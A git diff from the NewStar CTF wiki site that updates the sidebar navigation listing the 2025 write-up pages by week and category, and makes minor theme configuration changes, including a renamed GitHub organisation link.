/wp/2025/week1/reverse/plzdebugme + - text: Strange Base + link: /wp/2025/week1/reverse/strange-base + - text: Web + collapsed: true + items: + - text: 别笑,你也过不了第二关 + link: /wp/2025/week1/web/no-laugh + - text: 宇宙的中心是 PHP + link: /wp/2025/week1/web/center-php + - text: multi-headach3 + link: /wp/2025/week1/web/multi-headach3 + - text: strange_login + link: /wp/2025/week1/web/strange-login + - text: 黑客小 W 的故事(1) + link: /wp/2025/week1/web/black-w-1 + - text: 我真得控制你了 + link: /wp/2025/week1/web/control-you + - text: Crypto + collapsed: true + items: + - text: 初识 RSA + link: /wp/2025/week1/crypto/rsa-intro + - text: 随机数之旅 1 + link: /wp/2025/week1/crypto/random-1 + - text: SageMath 使用指南 + link: /wp/2025/week1/crypto/sagemath-guide + - text: 唯一表示 + link: /wp/2025/week1/crypto/unique-repr + - text: 小跳蛙 + link: /wp/2025/week1/crypto/little-frog + - text: Misc + collapsed: true + items: + - text: Sign in + link: /wp/2025/week1/misc/sign-in + - text: 我不要革命失败 + link: /wp/2025/week1/misc/no-revolution-fail + - text: Misc 城邦:压缩术 + link: /wp/2025/week1/misc/compression-magic + - text: OSINT:天空 belong + link: /wp/2025/week1/misc/osint-sky-belong + - text: EZ_fence + link: /wp/2025/week1/misc/ez-fence + - text: 前有文字,所以搜索很有用 + link: /wp/2025/week1/misc/search-is-useful + - text: Week 2 + items: + - text: Pwn + collapsed: true + items: + - text: 刻在栈里的秘密 + link: /wp/2025/week2/pwn/stack-secret + - text: no shell + link: /wp/2025/week2/pwn/no-shell + - text: syscall + link: /wp/2025/week2/pwn/syscall + - text: input_small_function + link: /wp/2025/week2/pwn/input-small-function + - text: calc_beta + link: /wp/2025/week2/pwn/calc-beta + - text: Reverse + collapsed: true + items: + - text: 尤皮·埃克斯历险记(1) + link: /wp/2025/week2/reverse/upx-1 + - text: 采一朵花,送给艾达(1) + link: /wp/2025/week2/reverse/flower-1 + - text: Forgotten_Code + link: /wp/2025/week2/reverse/forgotten-code + - text: Look at me carefully + link: /wp/2025/week2/reverse/look-carefully + - text: OhNativeEnc + link: /wp/2025/week2/reverse/ohnativeenc + - text: Web + collapsed: true + items: + - text: 真的是签到诶 + link: /wp/2025/week2/web/real-checkin + - text: 搞点哦润吉吃吃🍊 + link: /wp/2025/week2/web/orange-snack + - text: DD 加速器 + link: /wp/2025/week2/web/dd-accelerator + - text: 白帽小 K 的故事(1) + link: /wp/2025/week2/web/white-k-1 + - text: 小 E 的管理系统 + link: /wp/2025/week2/web/e-admin-system + - text: Crypto + collapsed: true + items: + - text: DLP_1 + link: /wp/2025/week2/crypto/dlp-1 + - text: 'FHE: 0&1' + link: /wp/2025/week2/crypto/fhe-0-1 + - text: 群论小测试 + link: /wp/2025/week2/crypto/group-theory-quiz + - text: 置换 + link: /wp/2025/week2/crypto/permutation + - text: RSA_revenge + link: /wp/2025/week2/crypto/rsa-revenge + - text: Misc + collapsed: true + items: + - text: 美妙的音乐 + link: /wp/2025/week2/misc/beautiful-music + - text: 日志分析:不敬者的闯入 + link: /wp/2025/week2/misc/log-intrusion + - text: OSINT:威胁情报 + link: /wp/2025/week2/misc/osint-threat-intel + - text: 星期四的狂想 + link: /wp/2025/week2/misc/thursday + - text: Misc 城邦:NewKeyboard + link: /wp/2025/week2/misc/newkeyboard + - text: Week 3 + items: + - text: Pwn + collapsed: true + items: + - text: fmt&canary + link: /wp/2025/week3/pwn/fmt-canary + - text: sandbox_plus + link: /wp/2025/week3/pwn/sandbox-plus + - text: 小的明?题问 + link: /wp/2025/week3/pwn/xiaoming-question + - text: calc_meow + link: /wp/2025/week3/pwn/calc-meow + - text: only_read + link: /wp/2025/week3/pwn/only-read + - text: Reverse + collapsed: true + items: + - text: pyz3 + link: /wp/2025/week3/reverse/pyz3 + - text: 采一朵花,送给艾达(2) + link: /wp/2025/week3/reverse/flower-2 + - text: 谁改了我的密钥啊 + link: /wp/2025/week3/reverse/who-changed-key + - text: 尤皮·埃克斯历险记(2) + link: /wp/2025/week3/reverse/upx-2 + - text: Dancing Functions + link: /wp/2025/week3/reverse/dancing-functions + - text: Web + collapsed: true + items: + - text: 小 E 的秘密计划 + link: /wp/2025/week3/web/e-secret-plan + - text: ez-chain + link: /wp/2025/week3/web/ez-chain + - text: MyGO!!! + link: /wp/2025/week3/web/mygo + - text: 白帽小 K 的故事(2) + link: /wp/2025/week3/web/white-k-2 + - text: mirror_gate + link: /wp/2025/week3/web/mirror-gate + - text: who'ssti + link: /wp/2025/week3/web/whossti + - text: Crypto + collapsed: true + items: + - text: CBC 之舞 + link: /wp/2025/week3/crypto/cbc-dance + - text: 被泄露的素数 + link: /wp/2025/week3/crypto/leaked-primes + - text: 欧皇的生日 + link: /wp/2025/week3/crypto/lucky-birthday + - text: 随机数之旅 3 + link: /wp/2025/week3/crypto/random-3 + - text: GCL + link: /wp/2025/week3/crypto/gcl + - text: Misc + collapsed: true + items: + - text: 流量分析:S7 的秘密 + link: /wp/2025/week3/misc/traffic-s7-secret + - text: 日志分析:盲辨海豚 + link: /wp/2025/week3/misc/log-blind-dolphin + - text: 内存取证:Windows 篇 + link: /wp/2025/week3/misc/mem-forensics-win + - text: 区块链:以太坊的约定 + link: /wp/2025/week3/misc/ethereum-promise + - text: jail-evil eval + link: /wp/2025/week3/misc/jail-evil-eval + - text: Week 4 + items: + - text: Pwn + collapsed: true + items: + - text: fmt&got + link: /wp/2025/week4/pwn/fmt-got + - text: 海市蜃楼 + link: /wp/2025/week4/pwn/mirage + - text: memory + link: /wp/2025/week4/pwn/memory + - text: calc_queen + link: /wp/2025/week4/pwn/calc-queen + - text: content + link: /wp/2025/week4/pwn/content + - text: Reverse + collapsed: true + items: + - text: NOT_TUI + link: /wp/2025/week4/reverse/not-tui + - text: PleaseHookMe + link: /wp/2025/week4/reverse/pleasehookme + - text: 尤皮·埃克斯历险记(3) + link: /wp/2025/week4/reverse/upx-3 + - text: Dancing Keys + link: /wp/2025/week4/reverse/dancing-keys + - text: ezrust + link: /wp/2025/week4/reverse/ezrust + - text: Web + collapsed: true + items: + - text: SSTI 在哪里? + link: /wp/2025/week4/web/ssti-where + - text: 武功秘籍 + link: /wp/2025/week4/web/kungfu-manual + - text: 小 E 的留言板 + link: /wp/2025/week4/web/e-message-board + - text: 小羊走迷宫 + link: /wp/2025/week4/web/lamb-maze + - text: sqlupload + link: /wp/2025/week4/web/sqlupload + - text: Crypto + collapsed: true + items: + - text: 独一无二 + link: /wp/2025/week4/crypto/one-and-only + - text: 随机数之旅 4 + link: /wp/2025/week4/crypto/random-4 + - text: 共轭迷宫 + link: /wp/2025/week4/crypto/conjugate-maze + - text: 三重密钥锁 + link: /wp/2025/week4/crypto/triple-key-lock + - text: 天虫的秘密 + link: /wp/2025/week4/crypto/silkworm-secret + - text: Misc + collapsed: true + items: + - text: 流量分析:听声辩位 + link: /wp/2025/week4/misc/traffic-sound-locate + - text: 区块链:智能合约 + link: /wp/2025/week4/misc/smart-contracts + - text: jail-Neuro jail + link: /wp/2025/week4/misc/jail-neuro + - text: 混乱的网站 + link: /wp/2025/week4/misc/chaotic-site + - text: 应急响应:初识 + link: /wp/2025/week4/misc/ir-intro + - text: Week 5 + items: + - text: Pwn + collapsed: true + items: + - text: 复读机堂堂归来!复读机堂堂归来! + link: /wp/2025/week5/pwn/fuduji-back + - text: note + link: /wp/2025/week5/pwn/note + - text: stdout + link: /wp/2025/week5/pwn/stdout + - text: go? + link: /wp/2025/week5/pwn/go-question + - text: Pwn the world + link: /wp/2025/week5/pwn/hack-the-world + - text: Reverse + collapsed: true + items: + - text: 魔法少女的秘密 + link: /wp/2025/week5/reverse/magical-girl-secret + - text: 天才的「认证」 + link: /wp/2025/week5/reverse/genius-auth + - text: AnEasySystem + link: /wp/2025/week5/reverse/an-easy-system + - text: Jvav Master + link: /wp/2025/week5/reverse/jvav-master + - text: 河图洛书 + link: /wp/2025/week5/reverse/hetu-luoshu + - text: Web + collapsed: true + items: + - text: 被玩坏的 AI + link: /wp/2025/week5/web/broken-ai + - text: 废弃的网站 + link: /wp/2025/week5/web/abandoned-site + - text: 小 W 和小 K 的故事(最终章) + link: /wp/2025/week5/web/w-k-story-final + - text: 眼熟的计算器 + link: /wp/2025/week5/web/familiar-calc + - text: Binary Blog + link: /wp/2025/week5/web/binary-blog + - text: Crypto + collapsed: true + items: + - text: 不给你看喵 + link: /wp/2025/week5/crypto/no-peek-meow + - text: BLS 多重签名:零的裂变 + link: /wp/2025/week5/crypto/bls-multisig-zero + - text: Poly + link: /wp/2025/week5/crypto/poly + - text: Smile 盒 + link: /wp/2025/week5/crypto/smile-box + - text: Misc + collapsed: true + items: + - text: 区块链:INTbug + link: /wp/2025/week5/misc/intbug-chain + - text: 应急响应:把你 mikumiku 掉(1) + link: /wp/2025/week5/misc/mikumiku-1 + - text: 应急响应:把你 mikumiku 掉(2) + link: /wp/2025/week5/misc/mikumiku-2 + - text: 应急响应:把你 mikumiku 掉(3) + link: /wp/2025/week5/misc/mikumiku-3 + - text: AI HACKER + link: /wp/2025/week5/misc/ai-hacker + - text: TIME HACKER + link: /wp/2025/week5/misc/time-hacker + - text: 挑战题 + items: + - text: Pwn + collapsed: true + items: + - text: llama-pwn + link: /wp/2025/extras/pwn/llama-pwn + - text: Reverse + collapsed: true + items: + - text: Not Symmetric + link: /wp/2025/extras/reverse/not-symmetric + - text: Web + collapsed: true + items: + - text: who'ssti revenge + link: /wp/2025/extras/web/whossti-revenge + - text: Crypto + collapsed: true + items: + - text: 黑盒 1 + link: /wp/2025/extras/crypto/blackbox-1 + - text: 混沌密码学入门 + link: /wp/2025/extras/crypto/chaos-cipher-intro + - text: 简约但不简单 + link: /wp/2025/extras/crypto/simple-not-simple + - text: 随机数之旅 1.3 + link: /wp/2025/extras/crypto/random-1.3 + - text: 随机数之旅 1.9 + link: /wp/2025/extras/crypto/random-1.9 + - text: 随机数之旅 2 + link: /wp/2025/extras/crypto/random-2 + - text: 随机数之旅 3.6 + link: /wp/2025/extras/crypto/random-3.6 + - text: 随机数之旅 3.9 + link: /wp/2025/extras/crypto/random-3.9 + - text: 运气与实力 + link: /wp/2025/extras/crypto/luck-vs-skill + - text: 置换 DLP + link: /wp/2025/extras/crypto/perm-dlp + - text: DLP + link: /wp/2025/extras/crypto/dlp + - text: final_R + link: /wp/2025/extras/crypto/final-r + - text: Weil 的噪声与秩序 + link: /wp/2025/extras/crypto/weil-noise-order + - text: Misc + collapsed: true + items: + - text: 不是所有牛奶都叫___ + link: /wp/2025/extras/misc/not-all-milk diff --git a/theme/biome.json b/theme/biome.json index 12e778e..2524863 100644 --- a/theme/biome.json +++ b/theme/biome.json @@ -1,3 +1,4 @@ { + "root": false, "extends": ["../biome.json"] } diff --git a/theme/components/Comments.vue b/theme/components/Comments.vue index 3717d7b..1f1a3a4 100644 --- a/theme/components/Comments.vue +++ b/theme/components/Comments.vue @@ -24,7 +24,7 @@ const p2k = (str: string) => { v-if="!!site.themeConfig.comments && frontmatter.comments !== false" > { >{ siteTitle: "NewStar CTF", - socialLinks: [{ icon: "github", link: "https://github.com/project-newstar/wiki-docs" }], + socialLinks: [{ icon: "github", link: "https://github.com/pj-newstar/wiki-docs" }], search: { provider: "local",